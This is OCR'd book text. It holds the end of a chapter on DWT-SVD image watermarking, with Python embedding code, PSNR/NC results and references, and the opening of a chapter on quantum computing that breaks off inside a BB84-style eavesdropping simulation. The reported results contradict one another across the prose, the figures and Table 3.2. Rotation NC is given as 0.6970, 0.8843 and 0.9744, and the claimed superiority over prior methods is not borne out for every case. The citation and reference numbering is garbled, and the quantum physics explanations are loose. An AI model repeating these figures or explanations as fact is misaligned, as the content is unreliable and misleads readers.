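def embed(host, wm, key):
    ll, details = dwt_level2(host)            # host LL sub-band
    u, s, vt = np.linalg.svd(ll)              # host S, U, V
    wll, wdetails = dwt_level2(wm)            # watermark LL sub-band
    uw, sw, vwt = np.linalg.svd(wll)          # watermark S, U, V
    pos = key_positions(key, s.size, sw.size)
    s_marked = s.copy()
    s_marked[pos] += ALPHA * sw               # assumed rule: S' = S + alpha * S_w
    marked = idwt_level2((u * s_marked) @ vt, details)
    side = {"tag": key_tag(key), "u": u, "s": s, "vt": vt,
            "uw": uw, "vwt": vwt, "wdetails": wdetails}
    return np.clip(np.rint(marked), 0, 255).astype(np.uint8), side

def extract(image, side, key):
    if not hmac.compare_digest(key_tag(key), side["tag"]):  # constant-time key check
        raise PermissionError("Not an authorized user")
    ll, _ = dwt_level2(image)
    # Project onto the host's singular vectors so values stay in embedding order
    # even if an attack or the embedding itself changed their sorted order.
    s_seen = np.diag(side["u"].T @ ll @ side["vt"].T)
    pos = key_positions(key, s_seen.size, side["uw"].shape[0])
    sw_est = (s_seen[pos] - side["s"][pos]) / ALPHA
    return idwt_level2((side["uw"] * sw_est) @ side["vwt"], side["wdetails"])

def psnr(a, b):
    mse = np.mean((np.asarray(a, float) - np.asarray(b, float)) ** 2)
    return float("inf") if mse == 0 else float(10 * np.log10(255.0 ** 2 / mse))

def nc(w, w_est):
    """Normalized correlation between original and extracted watermark."""
    w, w_est = np.asarray(w, float).ravel(), np.asarray(w_est, float).ravel()
    return float(w @ w_est / (np.linalg.norm(w) * np.linalg.norm(w_est)))

def sample_images():
    """Constructed 256x256 host and 64x64 watermark (stand-ins for Lena and 'A')."""
    y, x = np.mgrid[0:256, 0:256]
    host = 128 + 60 * np.sin(x / 20) * np.cos(y / 30)
    host = host + np.random.default_rng(1).normal(0, 5, host.shape)
    wm = np.zeros((64, 64))
    wm[16:48, 16:48] = 255
    wm[24:40, 24:40] = 0
    return np.clip(np.rint(host), 0, 255).astype(np.uint8), wm.astype(np.uint8)

def add_gaussian_noise(img, sigma, seed=7):
    noisy = img + np.random.default_rng(seed).normal(0, sigma, img.shape)
    return np.clip(np.rint(noisy), 0, 255).astype(np.uint8)

if __name__ == "__main__":
    host, wm = sample_images()
    marked, side = embed(host, wm, b"owner-key")
    print("PSNR:", round(psnr(host, marked), 2))
    print("NC, no attack:", round(nc(wm, extract(marked, side, b"owner-key")), 4))
    noisy = add_gaussian_noise(marked, 5.0)
    print("NC, Gaussian noise:", round(nc(wm, extract(noisy, side, b"owner-key")), 4))
```

The recovered image takes its singular vectors from the stored side information, so the NC figure here measures how well the embedded singular values survive an attack rather than an independent recovery of the watermark.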


3.5 Experimental Results


The simulation results with their analysis and comparison with the state-of-the-art methods are demonstrated in this section. The efficiency of this proposed method in terms of robustness and imperceptibility is evaluated with the help of standard IQA parameters such as PSNR and NC. PSNR has been used to define the offered imperceptibility whereas NC defines the robustness of the offered method. All the simulations are performed over Intel(R) Core i7-4600U CPU @ 2.10GHz Windows 10 with 8 GB RAM in MATLAB 2017 Platform. Haar wavelet is used to extract the features to achieve imperceptibility in the watermarking system. Standard test images Cameraman and Lena in .tiff format are used as the original host images and the letter A image in .tiff is used as the watermark. Figure 3.6 depicts the host and watermark image used in the experimental study for the analysis of the proposed method. The Cameraman and Lena images are both 256×256 whereas the watermark image is of the size 64×64.

The watermarked host images (Cameraman and Lena) without attack, along with their extracted watermark and attained values of PSNR and NC are presented in Figure 3.7. It is evident from this figure that PSNR values of 52.78 and 54.82 are achieved for the Cameraman and Lena image, respectively, which shows that the imperceptibility offered by this proposed method is quite high when the watermarked image is not attacked.

To validate the proposed watermarking method both the host images are exposed to attacks blurring, cropping, the addition of Gaussian noise, resize, salt & pepper noise, rotation, and sharpening. The effect of imposed attacks on Lena image is shown in the first column of Figure 3.8; the second and third column of this figure show the extracted watermark from the attacked watermarked image and the value of NC, respectively. The value of NC determines the robustness of this method. It can be seen that a very high value of NC (above 0.90) is achieved for the attacks Gaussian noise, salt & pepper noise, resize, and sharpening, and for the attacks cropping and rotation NC value is 0.8922 and 0.8843 which is also practically feasible to provide robustness. However, this proposed method is not able to attain a high NC for the rotation attack. For rotation attack, the value of NC is 0.6970.

Figure 3.6 (a) Original host image Cameraman, (b) Original host image Lena, and (c) watermark image.

Figure 3.7 (a) Watermarked Cameraman image and extracted watermark when non-attacked, with PSNR and NC value, (b) Watermarked Lena image and extracted watermark when non-attacked, with PSNR and NC value. Panel (b) is labelled PSNR: 54.82, NC: 0.9983.

After analyzing the efficiency of the proposed technique in terms of robustness and imperceptibility, finally, the efficacy of the recently proposed method is evaluated by comparing this method with other state-of-the-art methods [59 and 60]. The comparison results are presented in Tables 3.1 and 3.2, and the summary of this comparison is as discussed below:

Firstly, Table 3.1 shows that the PSNR value obtained by using the proposed method is higher than the techniques offered in [59, 60]. For the Cameraman image these methods can attain a PSNR value of 41.57 dB, whereas our proposed method attains a PSNR value of 52.78 dB for the same Cameraman image. This improvement in attained PSNR from [59] holds for the Lena image as well. We have achieved a PSNR value of 54.82 dB for the Lena image, which is a significant improvement in PSNR from [59 and 60].

Secondly, we can observe from Table 3.2 that the NC values obtained using the proposed method are higher than the methods listed in [10] against the image processing attacks. This table lists the NC values for the non-attacked watermarked image (for both Cameraman and Lena image) and for the same watermarked image when exposed to various attacks like blurring, cropping, the addition of Gaussian noise, salt & pepper noise, resize, sharpening, and rotation. Column 1 lists the state of the watermarked image, i.e., whether unattacked or intentionally/unintentionally attacked. Column 2 lists the NC value for the Cameraman image using the method proposed in [7]. The NC values for the Lena image for the methods proposed in [10] are shown in column 3 of this table. Columns 4 and 5 show the NC values of the Cameraman and Lena image obtained using the recently proposed method. From this table, it is evident that a high NC value for the extracted watermark is obtained by using our proposed method.

Panel   Imposed attack    NC of extracted watermark
(a)     Blurring          0.6970
(b)     Cropping          0.8922
(c)     Gaussian noise    0.9921
(d)     Salt & pepper     0.9401
(e)     Resize            0.9401
(f)     Rotation          0.8843

Figure 3.8 (a) Blurring attack on Lena image, (b) cropping attack on Lena image, (c) addition of Gaussian noise in Lena image, (d) addition of Salt & Pepper noise in Lena image, (e) resize of Lena image, (f) rotation of Lena image, with their respective extracted watermarks and attained NC values.


Table 3.1 PSNR values for the Cameraman and Lena image.

Image        Approach presented in [59 and 60]    Proposed method
Cameraman    41.57                                52.78
Lena         45.9                                 54.82


Table 3.2 NC values for the Cameraman and Lena image.

                    Approach in [3, 13]        Proposed method
Images/Attacks      Cameraman    Lena          Cameraman    Lena
Non-attacked        0.9990       0.9845        0.9999       0.9983
Blurring            0.6108       0.6658        0.6576       0.6970
Cropping            0.7140       0.6672        0.9441       0.8922
Gaussian Noise      0.9929       0.9702        0.9579       0.9921
Salt & Pepper       0.8918       0.8726        0.9640       0.9401
Resize              0.7466       0.7713        0.9640       0.9401
Sharpening          0.7942       0.7741        0.8657       0.8843
Rotation            0.9636       0.9517        0.9737       0.9744

It is evident from Table 3.2 that high NC and hence high robustness 
can be achieved using this proposed method. This is due to the following 
reasons: 


1. We have selected low-frequency coefficients for the watermark insertion procedure which provide high resistance towards the image processing attacks.

2. The presence of energy preservation property makes the low-frequency coefficients more tolerant against any image distortion.

3. The inclusion of a security key enhances the security of the watermark against unauthorized detection.


The PSNR and NC plots are demonstrated in Figures 3.9 and 3.10, respectively.

Figure 3.9 PSNR values for the results obtained by the method proposed in [7, 10] and our proposed method.

Figure 3.10 PSNR values for the results obtained by the method proposed in [7, 10] and our proposed method.

3.6 Conclusion


In this chapter, a novel grayscale image watermarking method in the hybrid 
domain using DWT and SVD hybridization is presented. This proposed 
method is highly secure against the unauthorized watermark extraction 
attempted by any Active attacker. Using the Haar wavelet decomposition in 
DWT we have extracted the low-frequency coefficients for the watermark 
embedding process. The watermark insertion over the low-frequency coef- 
ficients makes this proposed method robust against most of the image pro- 
cessing attacks. The watermark is inserted over the S coefficients extracted 
from these low-frequency coefficients, which makes this method more 
robust. The locations for the watermark insertion from these S coefficients 
are selected based upon the security key. Experimental analysis of the pro- 
posed methods and comparison with two state-of-the-art methods show- 
cased that the proposed scheme offers better imperceptibility and robustness 
against the image processing attacks such as blurring, cropping, the addition 
of Gaussian noise, resize, salt & pepper noise, rotation, and sharpening. 

The proposed method in this work is semi-blind because, during the 
watermark extraction process, we require the original watermark image. 
As the proposed method offers high performance in terms of robust- 
ness and imperceptibility along with enhancement in the security of the 
watermark, this method can be used for digital watermarking applications 
where copyright protection, copy protection, and ownership assertion are 
foremost required. 


References 


1. Cox, I. J., Kilian, J., Leighton, F. T., & Shamoon, T. (1997). Secure spread spectrum watermarking for multimedia. IEEE Transactions on Image Processing, 6(12), 1673-1687.

2. Kutter, M., & Petitcolas, F. A. (1999, April). Fair benchmark for image watermarking systems. In Security and Watermarking of Multimedia Contents (Vol. 3657, pp. 226-239). International Society for Optics and Photonics.

3. Cox, I. J., & Miller, M. L. (2002). The first 50 years of electronic watermarking. EURASIP Journal on Advances in Signal Processing, 2002(2), 1-7.

4. Cox, I. J., Miller, M. L., Bloom, J. A., & Honsinger, C. (2002). Digital Watermarking (Vol. 53). San Francisco: Morgan Kaufmann.

5. Mishra, S., Mahapatra, A., & Mishra, P. (2013). A survey on digital watermarking techniques. International Journal of Computer Science and Information Technologies, 4(3), 451-456.

6. Kadian, P., Arora, S. M., & Arora, N. (2021). Robust Digital Watermarking Techniques for Copyright Protection of Digital Data: A Survey. Wireless Personal Communications, 1-25.

7. Kadian, P., Arora, N., & Arora, S. M. (2019, March). Performance Evaluation of Robust Watermarking Using DWT-SVD and RDWT-SVD. In 2019 6th International Conference on Signal Processing and Integrated Networks (SPIN) (pp. 987-991). IEEE.

8. Kadian, P., Arora, N., & Arora, S. M. (2019). A Highly Secure and Robust Copyright Protection Method for Grayscale Images using DWT-SVD. In International Journal of Recent Technology and Engineering, 8(3), 7284-7288.

9. Kadian, P., Arora, N., & Arora, S. M. (2019). Role of scaling factor in Digital watermarking. In International Journal of Innovative Technology and Exploring Engineering, 8(11), 1658-1669.

10. Poonam, Arora, S. M. (2018). A DWT-SVD based robust digital watermarking for digital images. In Procedia Computer Science, 132, 1441-1448.

11. Kadian, P., Arora, V., & Arora, S. M. (2020, July). Robust Watermarking Schemes for Copyright Protection of Digital Data: A Survey. In 2nd International Conference on Emerging Technologies in Data Mining and Information Security (IEMIS 2020). Springer.

12. Roy, S., & Pal, A. K. (2018). An SVD based location specific robust color image watermarking scheme using RDWT and Arnold scrambling. Wireless Personal Communications, 98(2), 2223-2250.

13. alias Sathya, S. P., & Ramakrishnan, S. (2018). Fibonacci based key frame selection and scrambling for video watermarking in DWT-SVD domain. Wireless Personal Communications, 102(2), 2011-2031.

14. Jiansheng, M., Sukang, L., & Xiaomei, T. (2009). A digital watermarking algorithm based on DCT and DWT. In Proceedings. The 2009 International Symposium on Web Information Systems and Applications (WISA 2009) (p. 104). Academy publisher.

15. Mishra, A., Jain, A., Narwaria, M., & Agarwal, C. (2011). An experimental study into objective quality assessment of watermarked images. International Journal of Image Processing, 5(2), 199-219.

16. Hsu, C. T., & Wu, J. L. (1999). Hidden digital watermarks in images. IEEE Transactions on Image Processing, 8(1), 58-68.

17. Singh, D., Choudhary, N., & Agrawal, M. (2012). Spatial and Frequency Domain for Grey level Digital Images. Special Issue of International Journal of Computer Applications (0975-8887) on Communication Security (4), 16-20.

18. Chu, W. C. (2003). DCT-based image watermarking using subsampling. IEEE Transactions on Multimedia, 5(1), 34-38.

19. Yavuz, E., & Telatar, Z. (2006, September). SVD adapted DCT domain DC subband image watermarking against watermark ambiguity. In International Workshop on Multimedia Content Representation, Classification and Security (pp. 66-73). Springer, Berlin, Heidelberg.

20. Eyadat, M., & Vasikarla, S. (2005). Performance evaluation of an incorporated DCT block-based watermarking algorithm with human visual system model. Pattern Recognition Letters, 26(10), 1405-1411.

21. Rioul, O., & Duhamel, P. (1992). Fast algorithms for discrete and continuous wavelet transforms. IEEE Transactions on Information Theory, 38(2), 569-586.

22. Wang, X. Y., Yang, H. Y., & Fu, Z. K. (2010). A new wavelet-based image denoising using undecimated discrete wavelet transform and least squares support vector machine. Expert Systems with Applications, 37(10), 7040-7049.

23. Daubechies, I., & Sweldens, W. (1998). Factoring wavelet transforms into lifting steps. Journal of Fourier Analysis and Applications, 4(3), 247-269.

24. Verma, V. S., & Jha, R. K. (2015). Improved watermarking technique based on significant difference of lifting wavelet coefficients. Signal, Image and Video Processing, 9(6), 1443-1450.

25. Hsu, C. T., & Wu, J. L. (1998). Multiresolution watermarking for digital images. IEEE Transactions on Circuits and Systems II: Analog and Digital Signal Processing, 45(8), 1097-1101.

26. Lie, W. N., Lin, G. S., Wu, C. L., & Wang, T. C. (2000, May). Robust image watermarking on the DCT domain. In 2000 IEEE International Symposium on Circuits and Systems (ISCAS) (Vol. 1, pp. 228-231). IEEE.

27. Hernandez, J. R., Amado, M., & Perez-Gonzalez, F. (2000). DCT-domain watermarking techniques for still images: Detector performance analysis and a new structure. IEEE Transactions on Image Processing, 9(1), 55-68.

28. Barni, M., Bartolini, F., & Piva, A. (2001). Improved wavelet-based watermarking through pixel-wise masking. IEEE Transactions on Image Processing, 10(5), 783-791.

29. Liyun, S., Hong, M. A., & Shifu, T. (2006). Adaptive image digital watermarking with DCT and FCM. Wuhan University Journal of Natural Sciences, 11(6), 1657-1660.

30. Verma, V. S., & Jha, R. K. (2015). Improved watermarking technique based on significant difference of lifting wavelet coefficients. Signal, Image and Video Processing, 9(6), 1443-1450.

31. Li, E., Liang, H., & Niu, X. (2006, June). Blind image watermarking scheme based on wavelet tree quantization robust to geometric attacks. In 2006 6th World Congress on Intelligent Control and Automation (Vol. 2, pp. 10256-10260). IEEE.

32. Lin, W. H., Horng, S. J., Kao, T. W., Fan, P., Lee, C. L., & Pan, Y. (2008). An efficient watermarking method based on significant difference of wavelet coefficient quantization. IEEE Transactions on Multimedia, 10(5), 746-757.

33. Byun, K., Lee, S., & Kim, H. (2005, December). A watermarking method using quantization and statistical characteristics of wavelet transform. In Sixth International Conference on Parallel and Distributed Computing Applications and Technologies (PDCAT'05) (pp. 689-693). IEEE.


34. 


39. 


36. 


37. 


38. 


39. 


40. 


41. 


42. 


43. 


44, 


45. 


46. 


47. 


ENHANCED IMAGE SECURITY THROUGH HYBRID APPROACH 55 


Phadikar, A., Maity, S. P., & Kundu, M. K. (2008, December). Quantization 
based data hiding scheme for efficient quality access control of images 
using DWT via lifting. In 2008 Sixth Indian Conference on Computer Vision, 
Graphics & Image Processing (pp. 265-272). IEEE. 

Santhi, V., & Arulmozhivarman, P. (2013). Hadamard transform based adap- 
tive visible/invisible watermarking scheme for digital images. Journal of 
Information Security and Applications, 18(4), 167-179. 

Singh, A. K., Dave, M., & Mohan, A. (2014). Hybrid technique for robust and 
imperceptible dual watermarking using error correcting codes for applica- 
tion in telemedicine. International Journal of Electronic Security and Digital 
Forensics, 6(4), 285-305. 

Ahmad, A., Sinha, G. R., & Kashyap, N. (2014). 3-Level DWT Image 
Watermarking Against Frequency and Geometrical Attacks. International 
Journal of Computer Network & Information Security, 6(12). 

Rahman, M. A., & Rabbi, M. F. (2015). DWT-SVD based new watermarking 
idea in RGB color space. International Journal of Signal Processing, Image 
Processing and Pattern Recognition, 8(6), 193-198. 

Vaidya, S. P., & Mouli, P. C. (2015). Adaptive digital watermarking for copy- 
right protection of digital images in wavelet domain. Procedia Computer 
Science, 58, 233-240. 

Wu, H. T., & Huang, J. (2012). Reversible image watermarking on predic- 
tion errors by efficient histogram modification. Signal Processing, 92(12), 
3000-3009. 

Peng, F, Li, X., & Yang, B. (2012). Adaptive reversible data hiding scheme 
based on integer transform. Signal Processing, 92(1), 54-62. 

Jamal, S. S., Khan, M. U., & Shah, T. (2016). A watermarking tech- 
nique with chaotic fractional S-box transformation. Wireless Personal 
Communications, 90(4), 2033-2049. 

Anees, A. (2015). An image encryption scheme based on Lorenz system for 
low profile applications. 3D Research, 6(3), 1-10. 

Pan-Pan, N., Xiang-Yang, W., Yu-Nan, L., & Hong- Ying, Y. (2017). A robust 
color image watermarking using local invariant significant bitplane histo- 
gram. Multimedia Tools and Applications, 76(3), 3403-3433. 

Wang, X. Y., Niu, P. P., Yang, H. Y., & Chen, L. L. (2012). Affine invariant 
image watermarking using intensity probability density-based Harris Laplace 
detector. Journal of Visual Communication and Image Representation, 23(6), 
892-907. 

Gao, X., Deng, C., Li, X., & Tao, D. (2010). Geometric distortion insensi- 
tive image watermarking in affine covariant regions. IEEE Transactions on 
Systems, Man, and Cybernetics, Part C (Applications and Reviews), 40(3), 
278-286. 

Seo, J. S., & Yoo, C. D. (2006). Image watermarking based on invariant regions 
of scale-space representation. IEEE Transactions on Signal Processing, 54(4), 
1537-1549. 


56 


48. 


49. 


50. 


ol. 


52. 


53. 


54. 


D0: 


56. 


57. 


58. 


59. 


60. 


61. 


62. 


WIRELESS COMMUNICATION SECURITY 


Chen, C. H., Tang, Y. L., Wang, C. P., & Hsieh, W. S. (2014). A robust water- 
marking algorithm based on salient image features. Optik, 125(3), 1134-1140. 
Lei, B., Zhao, X., Lei, H., Ni, D., Chen, S., Zhou, E, & Wang, T. (2019). 
Multipurpose watermarking scheme via intelligent method and chaotic 
map. Multimedia Tools and Applications, 78(19), 27085-27107. 

Cao, X., Fu, Z., & Sun, X. (2016). A privacy-preserving outsourcing data stor- 
age scheme with fragile digital watermarking-based data auditing. Journal of 
Electrical and Computer Engineering, 2016. 

Singh, A. K. (2017). Improved hybrid algorithm for robust and impercep- 
tible multiple watermarking using digital images. Multimedia Tools and 
Applications, 76(6), 8881-8900. 

Rosiyadi, D., Horng, S. J., Fan, P., Wang, X., Khan, M. K., & Pan, Y. 
(2011). Copyright protection for e-government document images. [EEE 
MultiMedia, 19(3), 62-73. 

Singh, S., Rathore, V. S., Singh, R., & Singh, M. K. (2017). Hybrid semi-blind 
image watermarking in redundant wavelet domain. Multimedia Tools and 
Applications, 76(18), 19113-19137. 

Amini, M., Ahmad, M. O., & Swamy, M. N. S. (2017). Digital watermark 
extraction in wavelet domain using hidden Markov model. Multimedia Tools 
and Applications, 76(3), 3731-3749. 

Kalantari, N. K., & Ahadi, S. M. (2010). A logarithmic quantization index 
modulation for perceptually better data hiding. IEEE Transactions on Image 
Processing, 19(6), 1504-1517. 

Nezhadarya, E., Wang, Z. J., & Ward, R. K. (2011). Robust image watermark- 
ing based on multiscale gradient direction quantization. IEEE Transactions 
on Information Forensics and Security, 6(4), 1200-1213. 

Makbol, N. M., Khoo, B. E., & Rassem, T. H. (2018). Security analyses of 
false positive problem for the SVD-based hybrid digital image watermark- 
ing techniques in the wavelet transform domain. Multimedia Tools and 
Applications, 77(20), 26845-26879. 

Zhou, N. R., Hou, W. M. X., Wen, R. H., & Zou, W. P. (2018). Imperceptible 
digital watermarking scheme in multiple transform domains. Multimedia 
Tools and Applications, 77(23), 30251-30267. 

Ambadekar, S. P, Jain, J., & Khanapuri, J. (2019). Digital image watermark- 
ing through encryption and DWT for copyright protection. In Recent Trends 
in Signal and Image Processing (pp. 187-195). Springer, Singapore. 

Yu, P. T., Tsai, H. H., & Lin, J. S. (2001). Digital watermarking based on neu- 
ral networks for color images. Signal Processing, 81(3), 663-671. 

Zhenfei, W., Guangqun, Z., & Nengchao, W. (2006). Digital watermarking 
algorithm based on wavelet transform and neural network. Wuhan University 
Journal of Natural Sciences, 11(6), 1667-1670. 

Xu, X. Q., Wen, X. B., Li, Y. Q., & Quan, J. J. (2007, August). A new watermark- 
ing approach based on neural network in wavelet domain. In International 
Conference on Intelligent Computing (pp. 1-6). Springer, Berlin, Heidelberg. 


63. 


64. 


65. 


66. 


67. 


68. 


69. 


70. 


71. 


ENHANCED IMAGE SECURITY THROUGH HYBRID APPROACH 57 


Huang, S., Zhang, W., Feng, W., & Yang, H. (2008, June). Blind watermarking 
scheme based on neural network. In 2008 7th World Congress on Intelligent 
Control and Automation (pp. 5985-5989). IEEE. 

Ramamurthy, N., & Varadarajan, S. (2012). The robust digital image 
watermarking scheme with back propagation neural network in DWT 
domain. Procedia Engineering, 38, 3769-3778. 

Mun, S. M., Nam, S. H., Jang, H. U., Kim, D., & Lee, H. K. (2017). A robust 
blind watermarking using convolutional neural network. arXiv preprint 
arXiv:1704,03248. 

Liu, J. X., Wen, X. B., Yuan, L. M., & Xu, H. X. (2017). A robust approach 
of watermarking in contourlet domain based on probabilistic neural net- 
work. Multimedia Tools and Applications, 76(22), 24009-24026. 
Mohammed, G. N., Yasin, A., & Zeki, A. M. (2014, March). Robust image 
watermarking based on dual intermediate significant bit (DISB). In 2014 6th 
International Conference on Computer Science and Information Technology 
(CSIT) (pp. 18-22). IEEE. 

Cui, L., & Li, W. (2010). Adaptive multiwavelet-based watermarking through 
JPW masking. IEEE Transactions on Image Processing, 20(4), 1047-1060. 
http://hdl handle.net/10603/82341. 

K. Ramanjaneyulu, K. Rajarajeswari, “Wavelet-based oblivious image water- 
marking scheme using genetic algorithm’, IET Image Processing, Vol.6, Iss.4, 
pp. 364373, 2012. 

Lai, C. C., Ko, C. H., & Yeh, C. H. (2012, July). An adaptive SVD-based 
watermarking scheme based on genetic algorithm. In 2012 International 
Conference on Machine Learning and Cybernetics (Vol. 4, pp. 1546-1551). 
IEEE. 


4 Quantum Computing


Manisha Bharti* and Tanvika Garg 


National Institute of Technology, Delhi, India 


Abstract 

Quantum computers can bring about development in various fields like science
and medicine that could save lives. Quantum computing can be instrumental
in the advancement of machine learning so that illness can be diagnosed very
quickly. With its help, materials can be discovered so that efficient structures
and devices can be made. It helps to bring about development in financial
strategies so that one could lead a better life in retirement. There are various
benefits of classical computing that one can experience in day-to-day life, but
there are many challenges in today's world which cannot be solved using
classical computing. So quantum computing is being developed, which can be
used to enhance various algorithms in different fields.


Keywords: Entanglement, superposition, qubits, optical quantum computing 


4.1 Introduction 


Quantum Computing is the modernization of computing. It is based on
quantum mechanics and its phenomena. Quantum computing is the
combination of physics, computer science, information theory and
mathematics. It provides lower energy consumption, higher computational
power and better speed than the classical computers. These can be achieved
by controlling how the small objects behave, i.e., microscopic particles like
atoms, electrons, photons, etc.


4.2 A Brief History of Quantum Computing


The idea of a computational device based on quantum mechanics was first
considered in the 1970s and early 1980s by scientists such as Paul A.
Benioff of Argonne National Laboratory in Illinois, David Deutsch of the
University of Oxford, Charles H. Bennett of the IBM Thomas J. Watson
Research Centre and Richard P. Feynman of Caltech. They came up with this
idea while thinking about the limitations of computation. In 1982, Feynman
made an attempt to conceptualize a computer based on the principles of
quantum physics. He came up with a model that shows how computations
could be performed using a quantum system. He also explained how a
machine can simulate physical problems based on quantum physics.

In other words, a physicist would be capable of performing experiments 
in quantum physics using a quantum mechanical computer. Feynman later 
made an analysis that quantum computers can solve such problems that a 
classical computer cannot solve. The reason behind this is that a classical 
computer needs exponentially growing time to solve such problems while 
a quantum computer takes polynomial time to perform such a calculation. 

In 1985, Deutsch proposed that the theory that Feynman asserted could 
be used to make a general-purpose quantum computer. He showed that 
any physical process can be modelled by a quantum computer. Thus, a 
quantum computer would be far more capable than a traditional classical 
computer. So, in order to find other interesting applications for quantum 
computers, efforts were made by scientists of those times. But not much 
success was achieved in this regard. In 1994, Peter Shor came up with an 
idea of using quantum computers to crack a problem in number theory, 
namely factorisation. This breakthrough transformed quantum computing 
from just an academic curiosity to something that was of great interest to 
many in the world. 

At present, there is a need for high security, high bandwidth and high
computational capacity. The classical approach cannot fulfil this need and
does not provide a computing solution that one can rely upon. This has
driven the development of quantum physics along with quantum computing.
Efficient algorithms need to be developed in the field of computing in order
to use the principles of quantum mechanics in this field.

The basic postulates of quantum mechanics that govern quantum computing,
entanglement and polarization, and applications such as quantum
cryptography and teleportation, are described in the sections that follow.


4.3 Postulate of Quantum Mechanics


Quantum computing is ruled by four postulates. These postulates are the 
outcome of the observations which we get through experiments. These 
postulates are given as follows [2]: 


First Postulate 


“The actual state of any closed physical system can be described by 
means of a so-called state vector v having complex coefficients and unit 
length in a Hilbert space V, i.e., complex linear vector space (state space) 
equipped with an inner product.” [2] 


Second Postulate 


“The evolution of any closed physical system in time can be character- 
ized by means of unitary transforms depending only on the starting and 
finishing time of the evolution.” [2] 


Third Postulate 


“Any quantum measurement can be described by means of a set of
measurement operators $\{M_m\}$, where m stands for the possible results of
the measurement. The probability of measuring m if the system is in state v
can be calculated as” [2]


Fourth Postulate 


“The state space of a composite physical system W can be determined
using the tensor product of the individual systems $W = V \otimes Y$.
Furthermore, having defined $v \in V$ and $y \in Y$ then the joint state of
the composite system is $w = v \otimes y$” [2].


4.4 Polarization and Entanglement 


Polarization is achieved by orienting the oscillations that are perpendicular
to the plane in which a transverse wave is travelling. In the context of
quantum computing, photons are particles of light. These particles obey all
the above postulates and preserve the polarization property [3]. The vertical
and horizontal polarizations of light are explained by the following figures.

The vertical and horizontal polarizations are represented by p, and p,. The
angular polarization is represented by p, [1]. In the classical approach, we
can transmit either horizontally or vertically polarized light in order to
send logic bit 1, and transmit nothing for logic bit 0. We can also encode
vertically polarised light as logic 1 and horizontally polarised light as
logic 0 and then transmit it. This method makes it easier to obtain the
information from the bit received [1]. If light polarized at 45 degrees is
transmitted, one cannot tell whether it is logic 1 or 0, because it is equally
distant from the two axes. Therefore, a quantum measurement device decodes
half of it as logic 0 and the other half as logic 1. This is a random
detection, and it emphasizes the indeterminacy of quantum mechanics. This
can be explained by taking the example of the tossing of a coin [1].

Let us say there are three engineers, Bob, Alice and Eve. Alice wishes to
send information to Bob, i.e., 'heads' as '1' and 'tails' as '0'. This
transmission has no difficulty until Eve comes in between. Eve randomly
changes the state of the coin that she takes from Alice. This confuses Bob,
and an error in reception occurs. Bob and Alice learn about quantum
mechanics and decide to use its properties in this situation. Alice rotates
the coin and then sends it to Bob. In between, Eve takes the coin and flips
it. But Bob knows that the direction of rotation, not heads or tails,
represents the information. So it is easy for him to decode clockwise as
logic 1 and anticlockwise as logic 0. In the quantum mechanics scenario, the
coin is replaced by a photon and the rotation by polarization [4].

Another spectacular physical phenomenon seen in the quantum computing
world is entanglement or quantum superposition. When particles interact in
such a way, their quantum states cannot be described independently.
Particles can be generated in such a way that they have entangled states.
The particles are able to preserve their quantum states even though they
are very far away from each other [3].

This scenario is again explained by the example of Alice, Bob, and the
coin. This time Alice tosses two coins instead of one and asks Bob to catch
both of them. Bob can obtain four possible outcomes. To ensure that both
coins rotate in the same manner simultaneously, Alice sticks a rod to them.
Bob now receives only two states, which could be either tails or heads. The
scenario can be elaborated. Suppose Bob and Alice are three miles away from
each other, and the rod's length is increased to three miles. Alice asks Bob
to collect the coin from three miles away after she has tossed it. Bob
receives the same information, as both coins are in the same state. This can
be related to the quantum communication world: the two coins represent the
photonic entanglement, Alice is the transmitter, Bob is the receiver and the
distance is the channel [7].

The entanglement and polarization phenomena are very interesting and 
useful. They can be extended into applications that are security based like 
quantum key distribution, quantum cryptography, etc. [4]. 


4.5 Applications and Advancements 


4.5.1 Cryptography, Teleportation and Communication Networks


In this application, a particle's quantum state is transferred over a
distance. This phenomenon is based on the quantum entanglement mentioned
before. In teleportation, the information moves from one point to another.
Cryptography and computing are among the major applications of
entanglement [1]. Mathematical problems and algorithms are the basis of
conventional cryptography, so if the algorithm is cracked efficiently, the
security of the information is lost. Here, entanglement comes into the
picture. An attempt at eavesdropping alters the situation and can therefore
be analysed. This makes the communication reliable without using
complicated procedures and algorithms [9], and helps to establish secure
quantum communication [5].
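The two observations above, that a 45-degree photon is read as 0 or 1 at random and that eavesdropping alters what the receiver sees, can be checked with a small simulation. This is an added example, not code from the chapter: it models a polarization-encoded, BB84-style prepare-and-measure exchange (the chapter does not name a protocol, and this is not an entanglement-based scheme), and the diagonal basis, the intercept-and-resend model of Eve and the 5% alarm threshold are assumptions.

```python
import math
import random

# Polarization angle in degrees for each (basis, bit). The rectilinear basis "+"
# follows the chapter's encoding: horizontal = logic 0, vertical = logic 1.
# The diagonal basis "x" is an assumption of this example.
ANGLE = {("+", 0): 0, ("+", 1): 90, ("x", 0): 45, ("x", 1): 135}


def measure(angle, basis, rng):
    """Measure a photon polarized at `angle` in `basis`.

    Returns (bit, new_angle). The photon leaves the device polarized along the
    axis it was detected on, so measuring in the wrong basis changes its state.
    """
    delta = math.radians(angle - ANGLE[(basis, 0)])
    # Malus's law: probability of detection on the bit-0 axis is cos^2(delta).
    # Rounding removes floating-point noise such as cos(90 degrees) != 0.
    p_zero = round(math.cos(delta) ** 2, 12)
    bit = 0 if rng.random() < p_zero else 1
    return bit, ANGLE[(basis, bit)]


def fraction_read_as_one(angle, basis, trials, seed):
    """Fraction of identically polarized photons that are decoded as logic 1."""
    rng = random.Random(seed)
    return sum(measure(angle, basis, rng)[0] for _ in range(trials)) / trials


def run_exchange(n_photons, eavesdrop, seed):
    """Simulate Alice -> (Eve) -> Bob and return (sifted_bits, error_rate).

    Alice and Bob choose bases at random and keep only the positions where
    their bases agree (sifting). Without Eve those bits always match.
    """
    rng = random.Random(seed)
    sifted = errors = 0
    for _ in range(n_photons):
        a_bit, a_basis = rng.randint(0, 1), rng.choice("+x")
        angle = ANGLE[(a_basis, a_bit)]
        if eavesdrop:
            # Eve measures in a random basis and forwards what she detected.
            _, angle = measure(angle, rng.choice("+x"), rng)
        b_basis = rng.choice("+x")
        b_bit, _ = measure(angle, b_basis, rng)
        if b_basis == a_basis:
            sifted += 1
            errors += b_bit != a_bit
    return sifted, (errors / sifted if sifted else 0.0)


def eavesdropping_suspected(error_rate, threshold=0.05):
    """Alarm rule on the error rate of the compared bits (threshold is assumed)."""
    return error_rate > threshold


if __name__ == "__main__":
    print("45-degree photons read as 1:", fraction_read_as_one(45, "+", 4000, seed=7))
    for eve in (False, True):
        kept, qber = run_exchange(4000, eavesdrop=eve, seed=1)
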